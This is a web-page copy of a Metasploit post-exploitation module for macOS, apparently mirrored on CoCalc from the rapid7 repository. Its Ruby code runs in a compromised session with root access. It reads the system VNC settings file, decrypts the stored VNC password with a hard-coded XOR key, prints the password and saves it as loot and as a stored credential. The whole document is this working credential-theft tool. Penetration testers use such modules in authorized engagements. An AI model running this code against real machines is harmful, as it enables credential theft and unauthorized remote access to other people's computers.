Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/osx/gather/vnc_password_osx.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::OSX::Priv

8
  include Msf::Post::File

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'OS X Display Apple VNC Password',

15
        'Description' => %q{

16
          This module shows Apple VNC Password from Mac OS X High Sierra.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [ 'Kevin Gonzalvo <interhack[at]gmail.com>'],

20
        'Platform' => [ 'osx' ],

21
        'SessionTypes' => [ 'meterpreter', 'shell' ],

22
        'Notes' => {

23
          'Stability' => [CRASH_SAFE],

24
          'SideEffects' => [],

25
          'Reliability' => []

26
        }

27
      )

28
    )

29
  end

30


31
  def decrypt_hash(hash)

32
    return if hash.blank?

33


34
    aux = ['1734516E8BA8C5E2FF1C39567390ADCA'].pack('H*')

35
    fixedkey = aux.unpack('C*')

36


37
    str_pw = [hash.to_s].pack('H*')

38
    array_pwd = str_pw.unpack('C*')

39
    str = ''

40


41
    for data in fixedkey

42
      str += (data ^ array_pwd.shift).chr

43
    end

44


45
    return str.delete("\0")

46
  end

47


48
  def run

49
    unless is_root?

50
      fail_with(Failure::NoAccess, 'Root privileges are required to read VNC password file')

51
    end

52


53
    print_status('Checking VNC Password...')

54
    vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt'

55
    passwd_encrypt = read_file(vncsettings_path.to_s)

56
    final_passwd = decrypt_hash(passwd_encrypt.to_s)

57


58
    if final_passwd.nil?

59
      print_error('Password not found')

60
      return

61
    end

62


63
    print_good("Password Found: #{final_passwd}")

64
    pass_file = store_loot('osx.vnc.password', 'text/plain', session, final_passwd, 'passwd.pwd', 'OSX VNC Password')

65
    print_good("Password data stored as loot in: #{pass_file}")

66
    credential_data = {

67
      origin_type: :session,

68
      session_id: session_db_id,

69
      post_reference_name: fullname,

70
      private_type: :password,

71
      private_data: final_passwd.to_s,

72
      workspace_id: myworkspace_id

73
    }

74
    create_credential(credential_data)

75
  end

76
end

77


78